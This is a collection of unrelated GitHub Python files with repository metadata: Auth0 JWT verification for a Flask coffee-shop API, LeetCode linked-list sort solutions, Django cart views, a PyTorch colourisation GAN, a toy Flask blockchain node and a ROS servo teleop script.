|
0191a3eb28c7b743ce85a86b3972f91da8be926f
|
[] |
no_license
|
BassamMusaad/Coffee-shop
|
877a17d43fe899f8a70647b10dd60b726bb3c958
|
a2f449ac99b8b23e1bcde08a3783247c77b749ff
|
refs/heads/master
| 2023-01-12T07:06:01.241238
| 2020-11-15T23:10:35
| 2020-11-15T23:10:35
| 313,141,734
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,772
|
py
|
import json
from flask import request, _request_ctx_stack,abort
from functools import wraps
from jose import jwt
from urllib.request import urlopen
AUTH0_DOMAIN = 'coffee-udacity-api.us.auth0.com'
ALGORITHMS = ['RS256']
API_AUDIENCE = 'coffee-api'
# AuthError Exception
'''
AuthError Exception
A standardized way to communicate auth failure modes
'''
class AuthError(Exception):
def __init__(self, error, status_code):
self.error = error
self.status_code = status_code
# Auth Header
'''
@TODO implement get_token_auth_header() method
it should attempt to get the header from the request
it should raise an AuthError if no header is present
it should attempt to split bearer and the token
it should raise an AuthError if the header is malformed
return the token part of the header
'''
def get_token_auth_header():
auth = request.headers.get('Authorization', None)
if not auth:
raise AuthError({
'code': 'authorization_header_missing',
'description': 'Authorization header is expected.'
}, 401)
parts = auth.split()
if parts[0].lower() != 'bearer':
raise AuthError({
'code': 'invalid_header',
'description': 'Authorization header must start with "Bearer".'
}, 401)
elif len(parts) == 1:
raise AuthError({
'code': 'invalid_header',
'description': 'Token not found.'
}, 401)
elif len(parts) > 2:
raise AuthError({
'code': 'invalid_header',
'description': 'Authorization header must be bearer token.'
}, 401)
token = parts[1]
return token
'''
@TODO implement check_permissions(permission, payload) method
@INPUTS
permission: string permission (i.e. 'post:drink')
payload: decoded jwt payload
it should raise an AuthError if permissions are not included in the payload
!!NOTE check your RBAC settings in Auth0
it should raise an AuthError if the requested permission string is not in the payload permissions array
return true otherwise
'''
def check_permissions(permission, payload):
if 'permissions' not in payload:
raise AuthError({
'code': 'invalid_claims',
'description': 'Permissions not included in JWT.'
}, 400)
if permission not in payload['permissions']:
raise AuthError({
'code': 'unauthorized',
'description': 'Permission not found.'
}, 401)
return True
'''
@TODO implement verify_decode_jwt(token) method
@INPUTS
token: a json web token (string)
it should be an Auth0 token with key id (kid)
it should verify the token using Auth0 /.well-known/jwks.json
it should decode the payload from the token
it should validate the claims
return the decoded payload
!!NOTE urlopen has a common certificate error described here: https://stackoverflow.com/questions/50236117/scraping-ssl-certificate-verify-failed-error-for-http-en-wikipedia-org
'''
def verify_decode_jwt(token):
jsonurl = urlopen(f'https://{AUTH0_DOMAIN}/.well-known/jwks.json')
jwks = json.loads(jsonurl.read())
unverified_header = jwt.get_unverified_header(token)
rsa_key = {}
if 'kid' not in unverified_header:
print('hi agen')
raise AuthError({
'code': 'invalid_header',
'description': 'Authorization malformed.'
}, 401)
for key in jwks['keys']:
if key['kid'] == unverified_header['kid']:
rsa_key = {
'kty': key['kty'],
'kid': key['kid'],
'use': key['use'],
'n': key['n'],
'e': key['e']
}
if rsa_key:
try:
payload = jwt.decode(
token,
rsa_key,
algorithms=ALGORITHMS,
audience=API_AUDIENCE,
issuer='https://' + AUTH0_DOMAIN + '/'
)
return payload
except jwt.ExpiredSignatureError:
print('ExpiredSignatureError')
raise AuthError({
'code': 'token_expired',
'description': 'Token expired.'
}, 401)
except jwt.JWTClaimsError:
print('JWTClaimsError')
raise AuthError({
'code': 'invalid_claims',
'description': 'Incorrect claims. Please, check the audience and issuer.'
}, 401)
except Exception:
raise AuthError({
'code': 'invalid_header',
'description': 'Unable to parse authentication token.'
}, 400)
raise AuthError({
'code': 'invalid_header',
'description': 'Unable to find the appropriate key.'
}, 400)
'''
@TODO implement @requires_auth(permission) decorator method
@INPUTS
permission: string permission (i.e. 'post:drink')
it should use the get_token_auth_header method to get the token
it should use the verify_decode_jwt method to decode the jwt
it should use the check_permissions method validate claims and check the requested permission
return the decorator which passes the decoded payload to the decorated method
'''
def requires_auth(permission=''):
def requires_auth_decorator(f):
@wraps(f)
def wrapper(*args, **kwargs):
token = get_token_auth_header()
try:
payload = verify_decode_jwt(token)
except:
abort(401)
check_permissions(permission, payload)
return f(payload, *args, **kwargs)
return wrapper
return requires_auth_decorator
|
[
"basam3818@gmail.com"
] |
basam3818@gmail.com
|
695febf5554fa63e89c3488835a6ebfee28fb4d5
|
db4bf1696a2f5624618ccb6936718d470b48c5db
|
/sortList.py
|
45f944719edb1ab0e54a17d820432b1d8311650a
|
[] |
no_license
|
HuipengXu/leetcode
|
2a1657aad8d00452bc4e858d76d45db0146d3fbe
|
e2fecd266bfced6208694b19a2d81182b13dacd6
|
refs/heads/master
| 2022-01-24T11:59:55.315146
| 2019-07-21T04:12:30
| 2019-07-21T04:12:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,252
|
py
|
# @Time : 2019/4/9 8:44
# @Author : Xu Huipeng
# @Blog : https://brycexxx.github.io/
import random
# Definition for singly-linked list.
class ListNode(object):
def __init__(self, x):
self.val = x
self.next = None
class Solution(object):
def sortList0(self, head):
"""
:type head: ListNode
:rtype: ListNode
"""
def quick_sort_c(head, tail):
mid = partition(head, tail)
if mid is None: return
quick_sort_c(head, mid)
quick_sort_c(mid.next, tail)
def partition(head, tail):
if head == tail or head.next == tail: return
node = head
length = 1
while node.next != tail:
node = node.next
length += 1
idx = random.randint(0, length - 1)
i = j = mid = pivot = head
for _ in range(idx):
pivot = pivot.next
pivot.val, node.val = node.val, pivot.val
while i != tail:
if i.val <= node.val:
i.val, j.val = j.val, i.val
mid = j
j = j.next
i = i.next
return mid
quick_sort_c(head, None)
return head
def sortList1(self, head):
"""
:type head: ListNode
:rtype: ListNode
"""
def quick_sort_c(head, tail):
mid = partition(head, tail)
if mid is None: return
quick_sort_c(head, mid)
quick_sort_c(mid.next, tail)
def partition(head, tail):
if head == tail or head.next == tail: return
pivot, i, j = head.val, head.next, head
while i != tail:
if i.val < pivot:
j = j.next
i.val, j.val = j.val, i.val
i = i.next
head.val, j.val = j.val, head.val
return j
quick_sort_c(head, None)
return head
def sortList2(self, head):
"""
:type head: ListNode
:rtype: ListNode
"""
def quick_sort_c(parent, head, tail):
mid = partition(parent, head, tail)
if mid is None: return
quick_sort_c(parent, parent.next, mid)
quick_sort_c(mid, mid.next, tail)
def partition(parent, head, tail):
if head == tail or head.next == tail: return
mid = point = old_head = head
flag = False
while point.next != tail:
if point.next.val < head.val:
new_head = point.next
point.next = point.next.next
new_head.next = old_head
old_head = new_head
else:
if not flag:
mid = point
flag = True
point = point.next
parent.next = old_head
return mid
tmp_head = ListNode(-1)
tmp_head.next = head
quick_sort_c(tmp_head, head, None)
return tmp_head.next
# 通过,以上快排版本都超出时间限制
def sortList3(self, head):
"""
:type head: ListNode
:rtype: ListNode
"""
def merge_sort_c(parent, head, tail):
if head == tail or head.next == tail: return
fast = slow = head
while fast != tail:
if fast.next == tail:
break
fast = fast.next.next
slow = slow.next
merge_sort_c(parent, head, slow)
node = parent
while node.next != slow:
node = node.next
merge_sort_c(node, slow, tail)
merge(parent, parent.next, node.next, tail)
def merge(parent, head, mid, tail):
tmp_mid, tmp_parent = mid, parent
while head != tmp_mid and mid != tail:
if head.val < mid.val:
tmp_parent.next = head
tmp_parent = head
head = head.next
else:
tmp_parent.next = mid
tmp_parent = mid
mid = mid.next
if head == tmp_mid:
tmp_parent.next = mid
elif mid == tail:
tmp_parent.next = head
while tmp_parent.next != tmp_mid:
tmp_parent = tmp_parent.next
tmp_parent.next = tail
tmp_head = ListNode(-1)
tmp_head.next = head
merge_sort_c(tmp_head, head, None)
return tmp_head.next
def sortList4(self, head):
"""
:type head: ListNode
:rtype: ListNode
"""
def merge_sort_c(head):
if head == None: return
if head.next == None: return head
fast = slow = pre = head
while fast != None and fast.next != None:
pre = slow
slow = slow.next
fast = fast.next.next
# 分割链表
pre.next = None
l = merge_sort_c(head)
r = merge_sort_c(slow)
return merge(l, r)
def merge(l, r):
head = ListNode(-1)
tmp_head = head
while l != None and r != None:
if l.val < r.val:
tmp_head.next = l
tmp_head = l
l = l.next
else:
tmp_head.next = r
tmp_head = r
r = r.next
if l == None:
tmp_head.next = r
else:
tmp_head.next = l
return head.next
return merge_sort_c(head)
# 更加简洁的递归合并,归并排序
def sortList5(self, head: ListNode) -> ListNode:
def merge_sort_c(head: ListNode) -> ListNode:
if not head or not head.next: return head
slow = fast = head
prev = None
while fast and fast.next and fast.next:
prev = slow
slow = slow.next
fast = fast.next.next
prev.next = None
l1 = merge_sort_c(head)
l2 = merge_sort_c(slow)
return merge(l1, l2)
def merge(l1: ListNode, l2: ListNode) -> ListNode:
if not l1: return l2
if not l2: return l1
if l1.val < l2.val:
l1.next = merge(l1.next, l2)
return l1
else:
l2.next = merge(l1, l2.next)
return l2
return merge_sort_c(head)
# bottom-up,归并排序,空间复杂度为 O(1),时间复杂度O(nlogn)
def sortList6(self, head: ListNode) -> ListNode:
def cut(l: ListNode, n: int):
node = l
while n > 1 and node:
node = node.next
n -= 1
if not node: return None
cur = node.next
node.next = None
return cur
def merge(l1: ListNode, l2: ListNode) -> ListNode:
if not l1: return l2
if not l2: return l1
if l1.val < l2.val:
l1.next = merge(l1.next, l2)
return l1
else:
l2.next = merge(l1, l2.next)
return l2
dummy_head = ListNode(-1)
size, length = 1, 0
node = head
dummy_head.next = head
while node:
node = node.next
length += 1
while size < length:
cur = dummy_head.next
tail = dummy_head
while cur:
left = cur
right = cut(left, size)
cur = cut(right, size)
tail.next = merge(left, right)
while tail.next:
tail = tail.next
size *= 2
return dummy_head.next
if __name__ == "__main__":
head = ListNode(4)
node = head
for i in [2, 3, 1, 5]:
node.next = ListNode(i)
node = node.next
s = Solution()
sorted_head = s.sortList3(head)
|
[
"2531094755@qq.com"
] |
2531094755@qq.com
|
b8125a355008b28b7e64b95b94403ed2f4f096bb
|
9557a8a2e402b2576bbd0fee1a7f7241ec62d66e
|
/ttxs/apps/tt_cart/views.py
|
5dd145c9d231020a65b92f93aaec0d0023bfa0ff
|
[] |
no_license
|
Edmond-Qi/dailyfresh
|
69011fb3711a28b733cc1ab10352cd4631fc53cf
|
15e92fdce40d44543932ed997a01a9d165cb2bda
|
refs/heads/master
| 2021-04-15T15:23:21.010829
| 2018-04-07T15:49:28
| 2018-04-07T15:49:28
| 126,330,982
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,684
|
py
|
import json
from django.shortcuts import render
from django.http import JsonResponse,Http404
from redis import client
from tt_goods.models import GoodsSKU
from django_redis import get_redis_connection
# Create your views here.
def add(request):
'''
添加到购物车
党进行数据的添加、修改、删除时,一般采用的post方式
'''
if request.method != 'POST':
return Http404
dict = request.POST
sku_id = dict.get('sku_id')
count = int(dict.get('count', 0))
# 验证数据有效性
# 判断商品是否存在
if GoodsSKU.objects.filter(id=sku_id).count() <= 0:
return JsonResponse({'status':2})
if count <= 0:
return JsonResponse({'status':3})
if count >= 5:
count = 5
if request.user.is_authenticated():
# 如果用户已经登录,把购物车信息存储在redis中
redis_client = get_redis_connection()
key = 'cart%d' % request.user.id
if redis_client.hexists(key, sku_id):
# 如果有则数量相加
count1 = int(redis_client.hget(key, sku_id))
count2 = count
count0 = count1 + count2
if count0 > 5:
count0 = 5
redis_client.hset(key, sku_id, count0)
else:
# 如果无则添加
redis_client.hset(key, sku_id, count)
total_count = 0
for v in redis_client.hvals(key):
total_count += int(v)
return JsonResponse({'status': 1, 'total_count': total_count})
else:
# 如果未登录,把购物车信息存储在cookie中
# 存储数据的格式:{}
# 构造数据
cart_dict = {}
# 先从coookie中读取数据,如果cart_dict存在就解析出来,如果不存在就使用空字典
cart_str = request.COOKIES.get('cart')
if cart_str:
cart_dict = json.loads(cart_str)
if sku_id in cart_dict:
cart_dict[sku_id] += count
if cart_dict[sku_id] > 5:
cart_dict[sku_id] = 5
else:
cart_dict[sku_id] = count
# 计算商品总数量
total_count = 0
for k, v in cart_dict.items():
total_count += v
# 将字典转成字符串,用于存入cookie中
cart_str = json.dumps(cart_dict)
response = JsonResponse({'status': 1, 'total_count':total_count})
response.set_cookie('cart',cart_str,expires=60*60*24*14)
return response
def index(request):
# 查询购物车中的商品信息
sku_list = []
if request.user.is_authenticated():
redis_client = get_redis_connection()
key = 'cart%d'%request.user.id
id_list = redis_client.hkeys(key)
for id1 in id_list:
sku = GoodsSKU.objects.get(pk=id1)
sku.count = int(redis_client.hget(key, id1))
sku_list.append(sku)
else:
cart_str = request.COOKIES.get('cart')
if cart_str:
cart_dict = json.loads(cart_str)
for k, v in cart_dict.items():
sku = GoodsSKU.objects.get(id=k)
sku.count = v
sku_list.append(sku)
context={
'title':'购物车',
'sku_list':sku_list
}
return render(request, 'cart.html', context)
def edit(request):
if (request.method != 'POST'):
return Http404
dict = request.POST
sku_id = dict.get('sku_id',0)
count = int(dict.get('count',0))
# 验证数据的有效性
# 判断商品是否存在
if GoodsSKU.objects.filter(pk=sku_id).count() <= 0:
return JsonResponse({'status':2})
# 判断数量是否是一个有效数字
try:
count = int(count)
except:
return JsonResponse({'status':3})
print(count)
# 判断数量大于0并小于5
if count <= 0:
count = 1
elif count >= 5:
count = 5
response = JsonResponse({'status': 1})
# 改写购物车中的数量
if request.user.is_authenticated():
# 如果已经登陆,操作redis
redis_client = get_redis_connection()
key = 'cart%d'%request.user.id
if redis_client.hexists(key,sku_id):
redis_client.hset(key, sku_id, count)
else:
# 如果未登录操作cookie
cart_str = request.COOKIES.get('cart')
if cart_str:
cart_dict = json.loads(cart_str)
# 改写数量
cart_dict[sku_id] = count
cart_str = json.dumps(cart_dict)
response.set_cookie('cart', cart_str, expires=60*60*24*14)
return response
def delete(request):
if (request.method != 'POST'):
return Http404
dict = request.POST
sku_id = dict.get('sku_id',0)
# 验证数据的有效性
# 判断商品是否存在
if GoodsSKU.objects.filter(pk=sku_id).count() <= 0:
return JsonResponse({'status':2})
response = JsonResponse({'status': 1})
# 改写购物车中的数量
if request.user.is_authenticated():
# 如果已经登陆,操作redis
redis_client = get_redis_connection()
key = 'cart%d'%request.user.id
if redis_client.hexists(key,sku_id):
redis_client.delete(key, sku_id)
else:
# 如果未登录操作cookie
cart_str = request.COOKIES.get('cart')
if cart_str:
cart_dict = json.loads(cart_str)
# 改写数量
cart_dict.pop(sku_id)
cart_str = json.dumps(cart_dict)
response.set_cookie('cart', cart_str, expires=60*60*24*14)
return response
|
[
"baofengqi@foxmail.com"
] |
baofengqi@foxmail.com
|
e0926c7d612dd71cdb9cb6b25e9445d574869477
|
4e6f299f24fe861fea162ec7da911e2ec734dadf
|
/build/lib/colourgan/networks.py
|
6c09ac9aff2381b63b0119abf92e5bbf4ecb8681
|
[
"MIT"
] |
permissive
|
narenderkumarnain/ColourGAN
|
e4890df979e21a141e57f6746ad9b63019f07810
|
846622dfe037de0782613278241256ac7c784af4
|
refs/heads/master
| 2023-06-27T04:02:57.115816
| 2021-07-25T13:18:38
| 2021-07-25T13:18:38
| 380,448,770
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,370
|
py
|
'''Generator and Discriminator for GAN.'''
import torch
import torch.nn.functional as F
import torch.nn as nn
#Generator for the GAN
class Generator(nn.Module):
'''Generator Module for GAN.'''
def __init__(self , normalization = None):
super(Generator , self).__init__()
# downsampling layers
self.d1 = ConvolutionBlock(1 , 64 ,
normalization = normalization ,
kernel_size = 4 ,
stride = 1 ,
padding = 0 ,
dropout = None
)
self.d2 = ConvolutionBlock(64, 128,
normalization=normalization,
kernel_size=4,
stride=2,
padding=1,
dropout=None
)
self.d3 = ConvolutionBlock(128, 256,
normalization=normalization,
kernel_size=4,
stride=2,
padding=1,
dropout=None
)
self.d4 = ConvolutionBlock(256, 512,
normalization=normalization,
kernel_size=4,
stride=2,
padding=1,
dropout=None
)
self.d5 = ConvolutionBlock(512, 512,
normalization=normalization,
kernel_size=4,
stride=2,
padding=1,
dropout=None
)
# upsampling layers
self.u1 = TransposeConvolutionBlock(512 ,512 ,
normalization=normalization,
kernel_size=4,
stride=2,
padding=1,
dropout=None
)
self.u2 = TransposeConvolutionBlock(1024, 256,
normalization=normalization,
kernel_size=4,
stride=2,
padding=1,
dropout=None
)
self.u3 = TransposeConvolutionBlock(512, 128,
normalization=normalization,
kernel_size=4,
stride=2,
padding=1,
dropout=None
)
self.u4 = TransposeConvolutionBlock(256, 64,
normalization=normalization,
kernel_size=4,
stride=2,
padding=1,
dropout=None
)
self.final_layer = ConvolutionBlock(128 , 2 ,
normalization = None,
kernel_size=1,
stride=1,
padding=0,
dropout=None,
activation_function=nn.Tanh()
)
def forward(self , x):
'''Forward Method for Generator.'''
x = F.interpolate(x, size=(35,35),mode='bilinear',align_corners=True)
# print(f'Initial: {x.shape}')
# downsampling layers
d1 = self.d1(x)
d2 = self.d2(d1)
d3 = self.d3(d2)
d4 = self.d4(d3)
d5 = self.d5(d4)
# print(f'Shape d1: {d1.shape}')
# print(f'Shape d2: {d2.shape}')
# print(f'Shape d3: {d3.shape}')
# print(f'Shape d4: {d4.shape}')
# print(f'Shape d5: {d5.shape}')
# upsampling layers with U Net Structure
u1 = self.u1(d5,d4)
u2 = self.u2(u1,d3)
u3 = self.u3(u2,d2)
u4 = self.u4(u3,d1)
# print(f'Shape u1: {u1.shape}')
# print(f'Shape u2: {u2.shape}')
# print(f'Shape u3: {u3.shape}')
# print(f'Shape u4: {u4.shape}')
final = self.final_layer(u4)
# print(f'Final: {final.shape}')
return final
# Discriminator Module for GAN
class Discriminator(nn.Module):
'''Discriminator Module for GAN.'''
def __init__(self,
normalization=None):
super(Discriminator , self).__init__()
# downsampling layers
# similar to Donsampling in Generator
self.d1 = ConvolutionBlock(3, 64,
normalization=normalization,
kernel_size=4,
stride=1,
padding=0,
dropout=None
)
self.d2 = ConvolutionBlock(64, 128,
normalization=normalization,
kernel_size=4,
stride=2,
padding=1,
dropout=None
)
self.d3 = ConvolutionBlock(128, 256,
normalization=normalization,
kernel_size=4,
stride=2,
padding=1,
dropout=None
)
self.d4 = ConvolutionBlock(256, 512,
normalization=normalization,
kernel_size=4,
stride=2,
padding=1,
dropout=None
)
self.final_layer = ConvolutionBlock(512,1,
normalization=None,
kernel_size=4,
stride=1,
padding=0,
dropout=None,
activation_function=nn.Sigmoid()
)
def forward(self,x):
'''Forward method for Discriminator Module.'''
x = F.interpolate(x,size=(35,35), mode='bilinear', align_corners=True)
d1 = self.d1(x)
d2 = self.d2(d1)
d3 = self.d3(d2)
d4 = self.d4(d3)
# print(f'Shape d1: {d1.shape}')
# print(f'Shape d2: {d2.shape}')
# print(f'Shape d3: {d3.shape}')
# print(f'Shape d4: {d4.shape}')
final_out = self.final_layer(d4)
# print(f'Final intial: {final_out.shape}')
final_out = final_out.view(x.size()[0],-1)
# print(f'Final final: {final_out.shape}')
return final_out
# Convolution Layer Block for Downsampling Operation
class ConvolutionBlock(nn.Module):
'''Class for Convolution Blocks for Downsampling.'''
def __init__(self , input_channel , output_channel ,
normalization = None,
kernel_size = 4,
stride = 2,
padding = 1,
dropout = None,
activation_function = nn.ReLU() ):
super(ConvolutionBlock , self).__init__()
model_layers = []
# Appending the Main Convolution Layer
model_layers.append(
nn.Conv2d(input_channel , output_channel ,
kernel_size = kernel_size ,
stride = stride ,
padding = padding)
)
#Applying Normalization Layer
if normalization is not None:
if normalization == 'Batch':
model_layers.append(
nn.BatchNorm2d(output_channel)
)
elif normalization == 'Instance':
model_layers.append(
nn.InstanceNorm2d(output_channel)
)
# Appending Activation Function given in the input
model_layers.append(activation_function)
# If Dropout is applicable
if dropout is not None:
model_layers.append(
nn.Dropout(dropout)
)
# Making the Sequential Model
model = nn.Sequential(*model_layers)
self.model = model
def forward(self , x):
'''Forward Operation for Convolution Layer'''
return self.model(x)
# Transpose Convolution block for Upsampling Operation
class TransposeConvolutionBlock(nn.Module):
'''Transpose Convolution Block for Upsampling Architecture.'''
def __init__(self, input_channel, output_channel,
normalization=None,
kernel_size=4,
stride=2,
padding=1,
dropout=None,
activation_function=nn.ReLU()):
super(TransposeConvolutionBlock , self).__init__()
model_layers = []
# Adding the Transpose Convolution Layer
model_layers.append(
nn.ConvTranspose2d(input_channel , output_channel ,
kernel_size = kernel_size ,
stride = stride ,
padding = padding)
)
# adding normalization
if normalization is not None:
if normalization == 'Batch':
model_layers.append(
nn.BatchNorm2d(output_channel)
)
elif normalization == 'Instance':
model_layers.append(
nn.InstanceNorm2d(output_channel)
)
# adding activation function for the layer
model_layers.append(
activation_function
)
# adding dropout
if dropout is not None:
model_layers.append(
nn.Dropout(dropout)
)
# creating the sequential model
model = nn.Sequential(*model_layers)
self.model = model
def forward(self , x1 , skip_input):
'''Forward Method for the input.'''
x = self.model(x1)
return torch.cat((x , skip_input) , 1)
# # Testing
# if __name__=='__main__':
# gen = Discriminator()
# sample_input = torch.zeros((1,1,32,32))
# print(sample_input.shape)
# print(gen)
# print(gen(sample_input))
|
[
"narender.nain@siemens.com"
] |
narender.nain@siemens.com
|
1cc3ca676af44460a5e873263e4e289b22d460e9
|
28a462a28f443c285ca5efec181ebe36b147c167
|
/tests/compile/basic/es2017/IsWordChar.spec
|
3368377b8c1ab894dee23121519bfc6541f17fed
|
[
"BSD-3-Clause",
"BSD-2-Clause"
] |
permissive
|
kaist-plrg/jstar
|
63e71f9156860dc21cccc33a9f6c638dfee448ea
|
1282919127ea18a7e40c7a55e63a1ddaaf7d9db4
|
refs/heads/main
| 2022-07-22T08:12:34.947712
| 2022-02-27T04:19:33
| 2022-02-27T11:06:14
| 384,045,526
| 6
| 4
|
NOASSERTION
| 2022-02-27T11:05:26
| 2021-07-08T07:53:21
|
Python
|
UTF-8
|
Python
| false
| false
| 277
|
spec
|
1. If _e_ is -1 or _e_ is _InputLength_, return *false*.
1. Let _c_ be the character _Input_[_e_].
1. Let _wordChars_ be the result of ! WordCharacters().
1. If _c_ is in _wordChars_, return *true*.
1. Return *false*.
|
[
"h2oche22@gmail.com"
] |
h2oche22@gmail.com
|
aefa00c38430a003627bd4400aa0e86e606c81ba
|
46823239ca0a88ecabb7418a35f0e4a89097d82a
|
/hadcoin_node_5003.py
|
de830a99c6bd586145c770f1243b8325c42056f5
|
[] |
no_license
|
dsouzaAnush/Blockchain
|
c3c55418d0902b0f1e8717d3dd305b4d8f485f3a
|
dd2a8eaf07c9e8db98993e06131e76a08361c3f6
|
refs/heads/master
| 2020-03-27T01:25:46.330857
| 2018-08-26T17:39:44
| 2018-08-26T17:39:44
| 145,709,672
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,229
|
py
|
# -*- coding: utf-8 -*-
#Creates a cryptocurrency
import datetime
import hashlib
import json
from flask import Flask, jsonify, request
import requests
from uuid import uuid4
from urllib.parse import urlparse
# Part 1 : build a blockchain
class Blockchain:
def __init__(self):
self.chain = []
self.transactions = []#list of transactions for every block
self.create_block(proof = 1, previous_hash = '0')
self.nodes = set()
def create_block(self, proof, previous_hash):
block = {'index': len(self.chain) + 1,
'timestamp': str(datetime.datetime.now()),
'proof': proof,
'previous_hash': previous_hash,
'transactions': self.transactions}
self.transactions = []#because transacations is added to main ledger
self.chain.append(block)
return block
def get_previous_block(self):
return self.chain[-1]
def proof_of_work(self, previous_proof):
new_proof = 1
check_proof = False
while check_proof is False:
hash_operation = hashlib.sha256(str(new_proof**2 - previous_proof**2).encode()).hexdigest()
if hash_operation[:4] == '0000':
check_proof = True
else:
new_proof += 1
return new_proof
def hash(self, block):
encoded_block = json.dumps(block, sort_keys = True).encode()
return hashlib.sha256(encoded_block).hexdigest()
def is_chain_valid(self, chain):
previous_block = chain[0]
block_index = 1
while block_index < len(chain):
block = chain[block_index]
if block['previous_hash'] != self.hash(previous_block):
return False
previous_proof = previous_block['proof']
proof = block['proof']
hash_operation = hashlib.sha256(str(proof**2 - previous_proof**2).encode()).hexdigest()
if hash_operation[:4] != '0000':
return False
previous_block = block
block_index += 1
return True
def add_transaction(self, sender, receiver, amount):
self.transactions.append({'sender': sender,
'receiver':receiver,
'amount': amount})
previous_block = self.get_previous_block()
return previous_block['index'] + 1
def add_node(self, address):
parsed_url = urlparse(address)
self.nodes.add(parsed_url.netloc)
def replace_chain(self):
network = self.nodes
longest_chain = None
max_length = len(self.chain)
for node in network:
response = requests.get(f'http://{node}/get_chain')
if response.status_code == 200:
length = response.json()['length']
chain = response.json()['chain']
if length > max_length and self.is_chain_valid(chain):
max_length = length
longest_chain = chain
if longest_chain:
self.chain = longest_chain
return True
return False
#Part 2 : mine the blockchain
#create flask web app
app = Flask(__name__)
#create an address for node on port 5000
node_address = str(uuid4()).replace('-', '')
#create a blockchain
blockchain = Blockchain()
#mine a block
@app.route('/mine_block', methods = ['GET'])
def mine_block():
previous_block = blockchain.get_previous_block()
previous_proof = previous_block['proof']
proof = blockchain.proof_of_work(previous_proof)
previous_hash = blockchain.hash(previous_block)
blockchain.add_transaction(sender = node_address, receiver = 'abc', amount = 1)
block = blockchain.create_block(proof, previous_hash)
response = {'message': 'Congrats on mining a new block',
'index': block['index'],
'timestamp': block['timestamp'],
'proof': block['proof'],
'previous_hash': block['previous_hash'],
'transactions': block['transactions']}
return jsonify(response), 200
#get the full blockchain on postman
@app.route('/get_chain', methods = ['GET'])
def get_chain():
response = {'chain': blockchain.chain,
'length': len(blockchain.chain)}
return jsonify(response), 200
@app.route('/is_valid', methods = ['GET'])
def is_valid():
is_valid = blockchain.is_chain_valid(blockchain.chain)
if is_valid:
response = {'message': 'All good!'}
else:
response = {'message': 'We have problem!'}
return jsonify(response), 200
#Add new transaction to the blockchain
@app.route('/add_transaction', methods = ['POST'])
def add_transaction():
json = request.get_json()
transaction_keys = ['sender', 'receiver', 'amount']
if not all (key in json for key in transaction_keys):
return 'Part of transaction are missing', 400
index = blockchain.add_transaction(json['sender'], json['receiver'], json['amount'])
response = {'message': f'This Transaction will be in block {index}'}
return jsonify(response), 201
#part 3 - Decentralization
#connecting new nodes:
@app.route('/connect_node', methods = ['POST'])
def connect_node():
json = request.get_json()
nodes = json.get('nodes')
if nodes is None:
return "No available Nodes", 400
for node in nodes:
blockchain.add_node(node)
response = {'message': 'All connected nodes are:',
'total_nodes': list(blockchain.nodes)}
return jsonify(response), 201
#Replace chain with longest chain for consensus ie used when competing chains exist
@app.route('/replace_chain', methods = ['GET'])
def replace_chain():
is_chain_replaced = blockchain.replace_chain()
if is_chain_replaced:
response = {'message': 'Enforced Consensus by replacing multiple chains with the longest chain!',
'new_chain': blockchain.chain}
else:
response = {'message': 'All good!',
'actual_chain': blockchain.chain}
return jsonify(response), 200
#run the app
app.run(host = '0.0.0.0', port = 5003)
|
[
"anush.dsouza@sprinklr.com"
] |
anush.dsouza@sprinklr.com
|
8bc6202d3e4885c8c06b67a814828638cd8cc8e3
|
a7f49524e041c7e8d3ca5d732f90f06851e5b348
|
/src/beginner_tutorials/scripts/test_teleop.py
|
3b5a95e5651c08f5836c973725e1897746cf8875
|
[] |
no_license
|
dannyel2511/project-shark
|
fa03fa7a73416558be67e1ab07e8bb5f36711c91
|
8f55c74bfb486305bd9aa48aeeb410df918dbdef
|
refs/heads/master
| 2020-04-06T21:14:55.385511
| 2018-11-27T23:55:26
| 2018-11-27T23:55:26
| 157,797,561
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,362
|
py
|
#!/usr/bin/env python
import roslib; roslib.load_manifest('teleop_twist_keyboard')
import rospy
from std_msgs.msg import UInt16
import sys, select, termios, tty
msg = "Write W A S D"
def getKey():
tty.setraw(sys.stdin.fileno())
select.select([sys.stdin], [], [], 0)
key = sys.stdin.read(1)
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)
return key
if __name__=="__main__":
pub1 = rospy.Publisher('servo1', UInt16, queue_size=10)
pub2 = rospy.Publisher('servo2', UInt16, queue_size=10)
settings = termios.tcgetattr(sys.stdin)
rospy.init_node('servos_ctrl')
degress1 = 0
degress2 = 0
rate = rospy.Rate(100)
print(msg)
while(1):
key = getKey()
key = key.lower()
if(key == 'i'):
degress1 += 1
if(key == 'k'):
degress1 -= 1
if(key == 'o'):
degress2 += 1
if(key == 'l'):
degress2 -= 1
if degress1< 0:
degress1=0
if degress2< 0:
degress2=0
if degress1 >180:
degress1=180
if degress2> 180:
degress2=180
print("Servo 1:",degress1)
print("Servo 2:",degress2)
pub1.publish(degress1)
pub2.publish(degress2)
if (key == '\x03'):
break
rate.sleep()
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)
|
[
"dany_2511@live.com"
] |
dany_2511@live.com
|
21988568418b2069479c3265e9083ef3501f7e67
|
7296c60573cdb2688fbb9e721ff4399d6465d7a2
|
/tests.py
|
b90dcd2ebbc4e87b59d0c8c8557f174156806237
|
[] |
no_license
|
aclark4life/other
|
bc1562c451a9537743029c079478c22b1f514e18
|
dfdc253d43f28b2f7d6147c86ef69a6a08e60b48
|
refs/heads/master
| 2021-01-22T09:05:21.681038
| 2012-12-12T01:21:01
| 2012-12-12T01:21:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 475
|
py
|
from other import IUgly
from other import UglyDude
from unittest import TestCase
from unittest import main
from zope.interface import implements
from zope.interface.verify import verifyObject
class TestSuite(TestCase): # Not really a test suite
"""
"""
def test_ugly(self):
"""
Verify object has a beautiful attribute
"""
ugly_thing = UglyThing()
verifyObject(IUgly, ugly_thing)
if __name__ == '__main__':
main()
|
[
"aclark@aclark.net"
] |
aclark@aclark.net
|
a4375d25f59135cf9bd9c32c9bc56a270276239e
|
7966d7b17a967be4d7ae856074edb29ea42e2d03
|
/23_memoize/decorator.py
|
9bd2ea691a1d2a319c0068649d7a936ccd32fe09
|
[] |
no_license
|
th0mazzz/SoftDev2
|
